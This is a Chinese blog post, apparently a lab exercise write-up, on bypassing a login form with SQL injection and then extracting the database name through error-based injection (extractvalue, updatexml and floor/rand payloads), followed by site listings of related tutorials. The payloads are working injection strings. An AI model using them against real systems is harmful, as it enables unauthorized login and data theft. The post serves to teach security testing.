Web渗透测试之SQL注入:基于错误的登录界面绕过(二)

最新推荐文章于 2022-05-03 22:21:13 发布
最新推荐文章于 2022-05-03 22:21:13 发布
阅读量407 收藏 1
点赞数 1
分类专栏: SQL注入 文章标签: 安全漏洞 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/vodkaDL/article/details/109780431
版权

文章目录

前言

  该篇与上一篇在绕过登录界面的思想基本一致,不同点在于绕过后获得想要的信息的手段。因此本篇将围绕获取数据的手段展开。

题目分析

题目页面如下:
题目页面
按照上一篇的套路,先尝试提交一个单引号:
提交单引号
结果如下:
提交单引号结果
可以发现页面已经打印出了错误信息,这就很棒。

登录界面绕过

  仔细分析可以发现整个语句大致如下:
……username = (’’) and password = (’’)
因此闭合符应为(’’),接下来的步骤与上一篇基本一致。先随意构造用户名,再输入语句:’) or (‘1’) = ('1
输入构造的用户名和密码
结果如下:
登陆成功

导出数据

  与上次不同地是,这次登录成功后页面并没有打印任何可控的信息,因此无法使用联合查询注入。但最起码还能打印错误信息,因此可以使用报错注入。在先前讲get函数的报错注入时提到过报错注入主要有两种方式:利用XPATH语法错误进行报错以及floor三件套
extractvalue:
') and extractvalue(1,concat(0x7f,(select database()))) - -
(再提一嘴,这里是连续两个减号一个空格)
extractvalue
结果如下:extractvalue结果
updatexml:
') and updatexml(1,concat(0x7f,(select database())),1) - -
updatexml
结果如下:
updatexml结果
floor三件套:
') and (select 1 from (select count(*) ,concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a) - -
post函数本身是没有字符数限制的,但浏览器和服务器处理能力的不同会对字符串过长部分进行截断,因此尽管该语句语法上正确但无法生效。

总结

  尽管绕过登录界面后网页没有打印出任何可控信息,但却能打印错误信息,因此可以利用这一点进行报错注入,从而获得我们想要的信息。
  以上就是本篇的全部内容,我们下篇见。

VodkaDL
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
burpsuit神器绕过token验证实战
10-01
本课程介绍burpsuit的高级功能,在登录验证的时候,有的时候会用验证码,有的时候会用token,token是后端web服务随机生成的,每次登录的时候客户端需要携带正确的token到后端验证,否则视为无效登录,在bao破的时候遇到token验证大多数人会放弃,最开始token验证是为解决CSRF跨站脚本攻击,给登录bao破也带来困难,因此本教程介绍burpsuit的高级功能,希望对大家有所帮助;声明:所有教学都是为了网络安全服务,做信息安全交流,不能用于任何非法用途。
浅谈基于报错的手工注入
dzqxwzoe的博客
03-19 337
没学过的同学也不要慌,可以去B站搜索相关视频,你搜关键词网络安全工程师会出现很多相关的视频教程,我粗略的看了一下,排名第一的视频就讲的很详细。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。不过我们这个水平也就算个渗透测试工程师,也就只能做个基础的安全服务,而这个领域还有很多业务,像攻防演练、等保测评、风险评估等,我们的能力根本不够看。最后网站开发知识多少也要了解点,不过别紧张,只是学习基础知识。
Web渗透之验证码绕过实战 -kali/渗透测试/网络安全/信息安全
09-29
     课程介绍       课程介绍了web渗透中兵器排行榜第一的工具burpsuit,从0开始带领大家安装、po解、抓包、设置,最后通过实战,演示大家再bao破登录的页面时,经常遇到的需要bao破验证码,Burp绕过验证码实战,希望能够给大家渗透过程中带来一些新的思路和认识。      课程主要分为以下几个章节     1)Burpsuit工具安装和基本的配置     2)Burpsuit工具抓取Http数据包     3)Burpsuit工具抓取Https数据包     4)Burpsuit工具bao破登录密码-验证码绕过(上)     5)Burpsuit工具bao破登录密码-验证码绕过(下) 
burpsuit安装及实战教程 -kali/渗透测试/网络安全/信息安全
09-29
你将收获       课程以Kali系统中的常见渗透测试工具及分类为基础,讲解超过50+款渗透测试工具的介绍,基本涵盖了渗透测试中百分之80常见工具的使用。让小白测试人员在面对一个web系统和内网系统时有一个基本的思路,方便后续深入学习web渗透和内网渗透。适用人群       IT从业者、信息安全爱好者、互联网运维等课程介绍     1)Burpsuit工具安装和基本的配置     2)Burpsuit工具抓取Https数据包     3)Burpsuit工具修改数据包实现0元支付     4)Burpsuit工具爆破登录密码     5)Burpsuit工具爆破登录密码-验证码绕过(上)     6)Burpsuit工具爆破登录密码-验证码绕过(下)     7)Burpsuit工具爆破登录密码-token绕过
Web渗透测试SQL注入:基于错误登录界面绕过(一)
vodkaDL的博客
11-17 1169
文章目录前言题目分析导出数据总结 前言 题目分析 导出数据 总结
33-33.渗透测试渗透测试SQL注入基于报错注入(下)
05-10
渗透测试渗透测试SQL注入基于报错注入(下)
web渗透测试详细入门实践课程-kali/sql注入
06-20
本课程主要从渗透测试流程、情报收集流程、渗透测试metaspolit终端介绍、nmap扫描、文件包含漏洞、文件上传漏洞、sql注入等方面理论加实操web渗透测试详细专业技术知识。 购买课程的同学可以获取价值200的教学资源...
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
基于模型的Web应用SQL注入测试用例集生成
05-06
SQL注入漏洞一直以来都是威胁Web应用安全的主要问题之一, 其中SQL注入漏洞相较于一阶SQL注入更加隐蔽且威胁更大, 对其检测通常依赖于测试人员的先验知识与经验. 目前, 在缺乏源码信息的黑盒测试场景下, 还没有...
35-35.渗透测试SQL注入SQL注入防御
最新发布
05-10
35-35.渗透测试SQL注入SQL注入防御
使用cookie绕过验证码登录的实现代码
08-29
本文通过实例代码给大家详细介绍了使用cookie绕过验证码登录的实现方法,需要的朋友参考下吧
web安全之SQL注入绕过技术(四)
Longwaer
02-26 4715
学习掌握SQL注入绕过技术原理及使用方法,更好的用于日常的渗透测试中。
【22】WEB安全学习----MySQL注入-7(绕过限制)
尚未佩妥剑 转眼便江湖
09-20 1472
注释符:-- 、#、/**/绕过 只能闭合后面的语句,使其成为正确的SQL语句。 $sql="SELECT username FROM users WHERE id='{$id}' limit 0,1;" $id=-1' union select version() '1; $sql="SELECT username FROM users WHERE id='-1' union selec...
SQL注入漏洞原理,基本方法,绕过方法及防御
qq_62886656的博客
05-03 7989
目录 一,原理 ,如何注入? 1, 联合注入 2,基于错误的注入 3,布尔盲注 4,延时注入 三,绕过方法添加注释 四,防御方式 一,原理 SQL注入即是指web应用程序对用户输入数据的合法性没有判断,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 从过程上分析,在前端构造一份表单,可以是输入账号密码,也可以是其他能够输入并提交的功能,向后端传输数据的时候,如果我
网络渗透----验证码绕过、密码找回漏洞
EdisonJH的博客
03-13 1712
验证码绕过、密码找回漏洞 —笔记和实战 一、验证码作用 验证码(CAPTCHA)是:全自动区分计算机和人类的图灵测试的缩写、是一种区分用户是计算机还是人的全自动程序。 验证码可以防止:恶意破解密码、刷票、邮箱防止黑客对一个特定的程序暴力破解方式进行不断的尝试登录、实际上验证码是很多网站通行的方式、我们利用比较简易的方式实现了这个功能。 验证码五花八门:纯文本、点击字符、邮箱注册、滑块验证码 。 ...
SQL注入绕过登录验证
weixin_33893473的博客
06-15 4152
最近测试发现一个登录处的SQL注入,不用密码即可登录系统。首先在登录处输入“111'”,出现报错页面如图:判断可能存在注入进一步利用万能用户名测试admin' or '1'='1,不用输密码成功登录。分析一下这个payload:从报错信息可以看出查询语句是: select * from xxxx where username=' ' and pwd=' ' 当我们输入payload之后就变成如下...
PostMan测试接口时候,如何绕过登录的验证
热门推荐
静风落叶的博客
05-18 4万+
    之前测试的时候,需要页面进行登录之后,才能让访问后台程序,但是在进行接口测试的时候,没有验证就一直登录不进去,之后参考了一篇文章。解决如下。1.在浏览器上先登录登录成功后获取cookie:2.接着打开postman:记住JSESSIONID一定要大写,提交方式为POST提交方式...
渗透测试学习 十三、 SQLmap使用详解
weixin_30879833的博客
05-07 441
SQLmap介绍   sqlmap是一个由python语言编写的开源的渗透测试工具,它主要是检测SQL注入漏洞,是一款功能强大的SQL漏洞检测利用工具。   他可以检测的数据库有:access、msSQL、MySQL、oracle、postgresql、SQLserver、db2、sqlite等   可以进行SQL盲注、union查询、显错注入、延迟注入、post注入、cookie注入等,宽...
web渗透sql注入
03-24
1. SQL注入的原理:SQL注入是通过在用户输入中插入恶意的SQL代码,使得应用程序在执行SQL查询时执行了攻击者预期的操作,比如绕过登录验证、获取敏感数据等。 2. SQL注入的类型: - 基于错误的注入:攻击者通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值